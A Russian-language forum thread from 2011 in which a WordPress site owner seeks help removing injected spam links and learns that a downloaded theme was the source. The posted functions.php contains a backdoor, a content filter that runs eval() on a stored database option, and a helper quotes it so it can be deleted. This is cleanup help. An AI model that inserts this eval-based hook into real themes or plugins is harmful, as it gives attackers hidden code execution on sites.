Помощник
|
Вредоносный код, Помогите найти |
anpleshivcev
|
Сообщение
#1
|
||
|
|
||
|
|||
Genesis |
21.11.2011, 0:57;
Ответить: Genesis
Сообщение
#2
|
|
Мда хитро придумано. Факт взлома на лицо. Бекапов естественно близких нет? Не спец совсем в этом, но по логике для начала нужно определить каким образом внедрен код. Если скриптом, что скорее всего, тут я точно не помощник. А если вручную, то нужно повышать безопасность. Для начала откат на бекап, а дальше книжку в зубы. Посчитайте внешние ссылки и удалите их. Если работает скрипт внедренный они вернутся может не в том кол-ве и не в тех статьях, но вернутся. Для безопасности что сделано вообще? Хостеру о взломе также сообщите.
|
|
|
anpleshivcev
|
Сообщение
#3
|
|
Бекапы есть, но и в них то же самое. Я не знаю насколько давно это было сделано. А как определить каим образом был внедрен код? Если вручную, то как я понимаю, ссылка должна крыться в файле именно этой статьи, тогда вопрос: какой файл в вордпресс отвечает именно за содержимое статей. А если скрипт, то он тоже ведь должен быть внедрен в код, а значит и найти его можно. Только я не знаю, как он должен выглядеть и где более вероятней находиться. Хостер сообщил, что взлом произведен не через них, а через FTP. FTP заблокировал, пароль на хосте и сайте поменял - появились новые ссылки. Кто знает, что делать?
|
|
|
Maverick_mw |
23.11.2011, 22:40;
Ответить: Maverick_mw
Сообщение
#4
|
|
Если ссылки добавлены вручную, то сразу ясно что взломали либо админку wordpress, либо доступ phpmyadmin.
Если ссылки добавляются скриптом, то скрипт скорее всего находится в functions.php или single.php - эти файлы лежат в папке с темой сайта если не ошибаюсь то - /wp-content/themes/название-темы/ Но также есть вариант что добавляются через JS скрипт. Однозначно надо смотреть те файлы и проверять есть ли лишний код. |
|
|
anpleshivcev
|
Сообщение
#5
|
|
Смотрел - ничего не нашел. Может кто подскажет?
Вот код functions.php: [php]<?php add_filter('the_content', '_bloginfo', 100); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; } if ( function_exists('register_sidebars') ) register_sidebars(2,array( 'before_widget' => '<div id="%1$s" class="wp-widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<div class="wp-widget-title">', 'after_title' => '</div>', )); function widget_mytheme_search() { ?> <div class="search-widget-title">Как сделать</div> <div class="search-widget"> <form method="get" id="searchform" action="<?php bloginfo('home'); ?>/"> <input type="text" name="s" id="s" value="Поиск" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;"/> </form> </div> <?php } if ( function_exists('register_sidebar_widget') ) register_sidebar_widget(__('Search'), 'widget_mytheme_search'); ?>[/php] Вот single.php: [php]<?php get_header(); ?> <?php include(TEMPLATEPATH."/left.php");?> <?php include(TEMPLATEPATH."/right.php");?> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div class="center-widget-title"></div> <div class="center-widget"> <div id="post-<?php the_ID(); ?>"> <h1 class="post-title"> <?php the_title(); ?> </h1> <p class="postmeta"> <!-- <span class="post-date"><?php the_time('j M, Y') ?></span> --> <span class="post-filed"><?php the_category(', ') ?></span> <?php edit_post_link(__('Править'), ' · ', ''); ?> </p> <div class="post-content"> <?php the_content('<p class="serif">' . 'Continue Reading...' . '</p>'); ?> </div> <!-- Post Content --> <?php link_pages('<p><strong>' . 'Страницы' . ':</strong> ', '</p>', ''); ?> </div> <!-- post-id --> </div> <!-- center-widget --> <?php comments_template(); ?> <?php endwhile; else: ?> <div class="center-widget-title"></div> <div class="center-widget"> <h2>Error 404 - Страница не найдена.</h2> <p>Извините, но того что Вы искали здесь нет.</p> </div> <!-- center-widget --> <?php endif; ?> <?php get_footer(); ?>[/php] А если добавили вручную, то как они сделали так, чтобы ссылка была видна только незарегистрированному пользователю? |
|
|
Maverick_mw |
25.11.2011, 16:41;
Ответить: Maverick_mw
Сообщение
#6
|
|
anpleshivcev, попробуйте удалить следующий код и посмотреть.
[php]add_filter('the_content', '_bloginfo', 100); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; }[/php] |
|
|
anpleshivcev
|
Сообщение
#7
|
|
Спасибо большое! Помогло! Но этот код был изначально в functions.php этой темы. Это получается, что я ее скачал с сайта уже с кодом?
И еще вопрос: что этот код именно делает? После его удаления пароль в админке надо менять? |
|
|
Maverick_mw |
25.11.2011, 21:35;
Ответить: Maverick_mw
Сообщение
#8
|
|
|
anpleshivcev, Да, тему вы скачали уже с данным кодом. Пароль желательно сменить для профилактики. Этот код подключает скрипт с другого сайта, в данном случает скрипт безобидный и выводит только ссылку, но ведь мог бы и вирус цеплять на сайт.
|
|
|
||
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Почистить код на сайте | 1 | Timka | 1090 | 2.1.2021, 1:13 автор: 0pium |
|
Вы мне код, я вам как - делать не надо. | 0 | fedornabilkin | 942 | 18.9.2020, 18:59 автор: fedornabilkin |
|
Adobe muse: Не могу разместить нужный мне код сразу после Body | 0 | Evg82 | 3829 | 20.6.2020, 10:24 автор: Evg82 |
|
Повесить мой код Адсенса на ваш сайт на 1-2 дня | 4 | WildWeb8 | 3699 | 18.7.2018, 20:04 автор: startseo |
|
Нужен человек, который почистит код от ненужного мусора. (Вордпресс) | 51 | timkab_mw | 6813 | 2.8.2017, 12:01 автор: timkab_mw |
Текстовая версия | Сейчас: 29.3.2024, 5:39 |